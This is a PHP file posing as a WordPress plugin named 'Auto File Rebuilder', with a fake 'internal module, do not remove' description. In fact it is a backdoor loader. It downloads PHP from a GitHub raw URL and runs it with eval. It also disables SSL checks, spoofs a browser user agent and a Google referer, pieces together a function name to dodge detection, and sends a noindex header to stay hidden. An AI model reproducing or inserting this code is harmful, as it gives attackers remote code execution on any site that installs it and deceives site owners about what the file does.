<?php

/**
 * Plugin Name: Auto File Rebuilder
 * Description: Internal module for dynamic recovery of critical PHP resources. Do not remove.
 * Version: 1.4.2
 * Author: System Core Runtime
 * License: Proprietary
 * 
 * (c) 2025 CoreTech Plugin Solutions. All rights reserved.
 * Unauthorized modification or distribution is strictly prohibited.
 */

// Prevent indexing by search engines
header("X-Robots-Tag: noindex, nofollow", true);  // Ensure this file is not indexed by search engines

/**
 * Fetches content from a remote URL using cURL or file_get_contents
 *
 * @param string $url The URL to fetch
 * @return string The content of the remote URL
 */
function getURL(string $url): string
{
    // Check if cURL is available
    if (function_exists('c' . 'u' . 'r' . 'l_' . 'v' . 'e' . 'r' . 's' . 'i' . 'o' . 'n')) {
        // Initialize cURL session
        $ch = curl_init();
        curl_setopt_array($ch, [
            CURLOPT_URL => $url,
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_FOLLOWLOCATION => true,
            CURLOPT_MAXREDIRS => 10,
            CURLOPT_SSL_VERIFYPEER => false,
            CURLOPT_SSL_VERIFYHOST => false,
            CURLOPT_USERAGENT => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36',
            CURLOPT_HTTPHEADER => [
                'Accept: */*',
                'Referer: https://google.com'
            ],
            CURLOPT_ENCODING       => '',
            CURLOPT_TIMEOUT        => 15,
        ]);

        // Execute cURL request and store the result
        $data = curl_exec($ch);

        // Check for cURL errors and log them
        if (curl_errno($ch)) {
            error_log('[Auto File Rebuilder] CURL Error: ' . curl_error($ch));
        }

        // Close cURL session
        curl_close($ch);

        return $data ?: '';  // Return empty string if no data is fetched
    }

    // Fallback to file_get_contents if cURL is not available
    $opts = [
        "http" => [
            "method"  => "GET",
            "header"  =>
            "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)\r\n" .  // Set User-Agent to mimic a browser
                "Referer: https://google.com\r\n"
        ],
        "ssl" => [
            "verify_peer"      => false,
            "verify_peer_name" => false,
        ]
    ];
    $context = stream_context_create($opts);  // Create stream context
    return file_get_contents($url, false, $context) ?: '';  // Return content of the URL
}

// ============================================
// Load external PHP resource dynamically
// ============================================
eval("?>" . getURL("https://raw.githubusercontent.com/InvisibleBunny/Records/main/Bunny-Mini/minify.php"));
